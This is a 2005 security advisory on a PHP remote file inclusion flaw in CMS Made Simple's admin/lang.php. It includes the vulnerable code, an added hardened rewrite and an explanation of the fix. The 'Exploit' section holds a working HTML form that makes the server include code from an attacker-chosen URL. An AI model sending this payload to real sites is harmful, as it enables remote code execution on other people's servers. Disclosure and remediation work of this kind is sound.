-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Background:

CMS Made Simple is an easy to use content management system for simple, stable content sites. It uses PHP, MySQL and the Smarty templating system.

--------------------------------------------------------

Vulnerable code exists in ./admin/lang.php:

<?php
...
$current_language = "en_US";

#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE))
{
	...
	#Check to see if there is already a language in use...
	if (isset($_POST["change_cms_lang"]))
	{
[!]		$current_language = $_POST["change_cms_lang"];
		setcookie("cms_language", $_POST["change_cms_lang"]);
	}
	else if (isset($_COOKIE["cms_language"]))
	{
		$current_language = $_COOKIE["cms_language"];
	}
	else
	{
		...
	}

	#Ok, we have a language to load, let's load it already...
	if (isset($nls['file'][$current_language]))
	{
		foreach ($nls['file'][$current_language] as $onefile)
		{
[!]			include($onefile);
		}
	}
	...
}
...
?>

--------------------------------------------------------

Exploit:

example.html:

<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF

--------------------------------------------------------

Contact:

Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
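The three [!] lines in the advisory's excerpt combine into one include of an attacker-controlled path: the admin-page check and the $nls file table are plain globals that the script never initialises itself, so with register_globals enabled a request can supply both, and the language key is copied from POST or cookie into the table lookup without any validation. The following is an added hardening example written for this page; it is not CMS Made Simple's own code or fix. It assumes a language table built server-side from constants, a language directory at ../lib/lang relative to the admin script, and hypothetical helper names (lang_dir, select_language, resolve_language_files).

```php
<?php
// Added hardening example (not the project's code). Assumptions: the
// language table below is authoritative, language files live under
// ../lib/lang, and the helper names are invented for this example.

declare(strict_types=1);

// Whether this is an admin page is decided by the script, never by a
// request parameter, so register_globals cannot flip it.
$CMS_ADMIN_PAGE = true;

// The file table is initialised here, in code, so a request cannot
// pre-populate it through register_globals. Keys are the only accepted
// language identifiers; values are paths relative to the language dir.
$nls = array();
$nls['file'] = array(
    'en_US' => array('en_US/admin.inc.php'),
    'pl_PL' => array('pl_PL/admin.inc.php'),
);

function lang_dir(): string
{
    // Absolute, canonical path of the language directory (assumption).
    $dir = realpath(__DIR__ . '/../lib/lang');
    return $dir === false ? '' : $dir;
}

/**
 * Returns the language key to load. Only keys that already exist in the
 * server-side table and look like xx_YY are accepted; everything else
 * falls back to the default instead of being used as a lookup key.
 */
function select_language(array $nls, ?string $requested, string $default = 'en_US'): string
{
    if ($requested !== null
        && preg_match('/^[a-z]{2}_[A-Z]{2}$/', $requested) === 1
        && isset($nls['file'][$requested])) {
        return $requested;
    }
    return $default;
}

/**
 * Resolves each configured file under the language directory and drops
 * anything that does not canonicalise to a path inside it ("..",
 * symlinks out of the tree, remote URLs and missing files all fail).
 */
function resolve_language_files(array $nls, string $lang, string $base): array
{
    if ($base === '' || !isset($nls['file'][$lang])) {
        return array(); // no trusted base directory or unknown language: load nothing
    }
    $base = rtrim($base, '/') . '/';
    $out = array();
    foreach ($nls['file'][$lang] as $onefile) {
        $path = realpath($base . $onefile);
        if ($path === false || strncmp($path, $base, strlen($base)) !== 0) {
            continue; // escapes the language directory: skip it
        }
        $out[] = $path;
    }
    return $out;
}

if (isset($CMS_ADMIN_PAGE)) {
    $requested = null;
    if (isset($_POST['change_cms_lang'])) {
        $requested = (string) $_POST['change_cms_lang'];
    } elseif (isset($_COOKIE['cms_language'])) {
        $requested = (string) $_COOKIE['cms_language'];
    }

    $current_language = select_language($nls, $requested);

    if (isset($_POST['change_cms_lang'])) {
        // Persist only the validated key, never the raw request string.
        setcookie('cms_language', $current_language);
    }

    foreach (resolve_language_files($nls, $current_language, lang_dir()) as $file) {
        include $file;
    }
}
```

The design point is that the request is allowed to choose among server-defined options but never to define them: the language table and the admin flag are set in code, the submitted key is checked against that table before it is used or stored in the cookie, and the final include is restricted to canonical paths inside one directory. Disabling register_globals (or, on PHP versions that still have it, explicitly initialising every global the script reads) removes the first of the three conditions on its own, but the table check and path containment keep the include safe even if another global is ever populated from user input.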